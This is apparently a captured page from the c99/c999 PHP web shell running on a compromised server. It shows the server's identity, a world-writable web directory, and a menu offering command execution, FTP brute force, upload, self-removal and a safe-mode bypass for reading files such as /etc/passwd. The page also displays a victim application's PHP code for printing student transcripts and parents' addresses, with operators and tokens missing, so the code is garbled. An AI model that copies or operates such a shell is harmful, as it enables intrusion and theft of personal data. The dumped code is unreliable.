!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis2222/application/views/eregis/   drwxrwxrwx
Free 50.65 GB of 127.8 GB (39.63%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    

Viewing file:     v_rptRis112_11.php (6 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

class PDF extends FPDF {

//Page header
function Header() {
//AngsanaNew bold 15
//Move to the right
//Draw line

//Page footer
function Footer() {
//Position at 3.0 cm from bottom
//Page number
$this->Cell(0,0,'หน้า '.$this->PageNo().'/{nb}',0,0,'R');
$this->Cell(0,0,'วันที่พิมพ์ : '.date("d/m/y H:i"),0,0,'L'); 
//End class

    //Create new pdf file
$pdf=new PDF();
$pdf->cfgClgLogo $this->config->item('rg_upload_picture').$cfgClgLogo;
$pdf->cfgClgName iconv('UTF-8','TIS-620',$cfgClgName);
$pdf->cfgSiteName iconv('UTF-8','TIS-620',$cfgSiteName);

//Set thai font


//Open file

//Disable automatic page break

//Set initial y axis position per page
$y_axis_initial 50;

//Set initial x position of table
$x_axis_initial 20;

//Set Row Height
$row_height 6;
    if ( 
$rs_std->num_rows() > 0) {
$rs_std->result() as $row) {
$pdf->Cell(0,0,'หลักสูตร '.iconv('UTF-8','CP874',$row->curName).'   ระดับ '.iconv('UTF-8','CP874',$row->levelName).'   รุ่นที่ '.iconv('UTF-8','CP874',$row->genNo),0,0,'C');
$pdf->Cell(0,0,'ภาคการศึกษาที่ '.$tmId.'   ปีการศึกษา '.$acY,0,0,'C');
$pdf->Cell(0,0,'รหัสนักศึกษา '.iconv('UTF-8','CP874',$row->stdCode).'   ชื่อ-สกุลนักศึกษา '.iconv('UTF-8','CP874',$row->prefixName).iconv('UTF-8','CP874',$row->stdName).' '.iconv('UTF-8','CP874',$row->stdSurname),0,0,'C');

//print column titles for the actual page
$y_axis $y_axis_initial $row_height;
$rs_rd $rd->getRegistDetailsByStdIdAcYTmId($row->stdId$acY$tmId);
            if ( 
$rs_rd->num_rows() > 0) {
$rs_rd->result() as $row_rd) {

                    if (
$row_rd->coDeclareStatus == 'Y') {
                    } else {

//Go to next row
$y_axis $y_axis $row_height;

$y_axis $y_axis $row_height;
$y_axis $y_axis $row_height;
$i 0;
$rs_grd $grd->qryGtpId($row->curGtpId);
$rs_grd->result() as $row_grd) {
$i%5) == 0) {
$y_axis $y_axis $row_height;
$pdf->Cell(35,0,iconv('UTF-8','CP874',$row_grd->grdGrade).' : '.iconv('UTF-8','CP874',$row_grd->grdDescription),0,0,'L');
$cond = array('ssmStdId' => $row->stdId,
'ssmAcY' => $acY,
'ssmTmId' => $tmId);
$qu_ssm $ssm->qrySsm($cond);
            if (
$qu_ssm->num_rows()) {
$row_ssm $qu_ssm->row();
$gpa iconv('UTF-8','CP874',$row_ssm->ssmGPA);
$ssmCreditPoint =  iconv('UTF-8','CP874',$row_ssm->ssmCreditPoint);
$ssmGPAX =  iconv('UTF-8','CP874',$row_ssm->ssmGPAX);
$ssmSumCreditPoint =  iconv('UTF-8','CP874',$row_ssm->ssmSumCreditPoint);
            } else {
$gpa 0;
$ssmCreditPoint =  '';
$ssmGPAX =  0;
$ssmSumCreditPoint =  '';

$pdf->Cell(90,0,'คะแนนเฉลี่ยรายภาค : '.number_format($gpa2),0,0,'L');
$pdf->Cell(0,0,'รวมหน่วยกิตรายภาค : '.$ssmCreditPoint,0,0,'L');
$pdf->Cell(90,0,'คะแนนเฉลี่ยสะสม : '.number_format($ssmGPAX2),0,0,'L');
$pdf->Cell(0,0,'รวมหน่วยกิต : '.$ssmSumCreditPoint,0,0,'L');

$pdf->Cell(0,0,'ผู้ปกครอง '.iconv('UTF-8','CP874',$row->prefixName).iconv('UTF-8','CP874',$row->stdName).' '.iconv('UTF-8','CP874',$row->stdSurname),0,0,'L');
$pdf->Cell(0,0,'ที่อยู ่ '.iconv('UTF-8','CP874',$row->sdtParentAddr),0,0,'L');
$pdf->Cell(0,0,'ตำบล '.iconv('UTF-8','CP874',$row->districtName).'  อำเภอ '.iconv('UTF-8','CP874',$row->amphurName),0,0,'L');
$pdf->Cell(0,0,'จังหวัด '.iconv('UTF-8','CP874',$row->provinceName).'  '.iconv('UTF-8','CP874',$row->sdtParentPostCode),0,0,'L');

//End foreach
} else {
//Create file

:: Command execute ::


:: Shadow's tricks :D ::

Useful Commands
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)


eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):


eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
[ ok ]

:: Make Dir ::
[ ok ]
:: Make File ::
[ ok ]

:: Go Dir ::
:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0075 ]--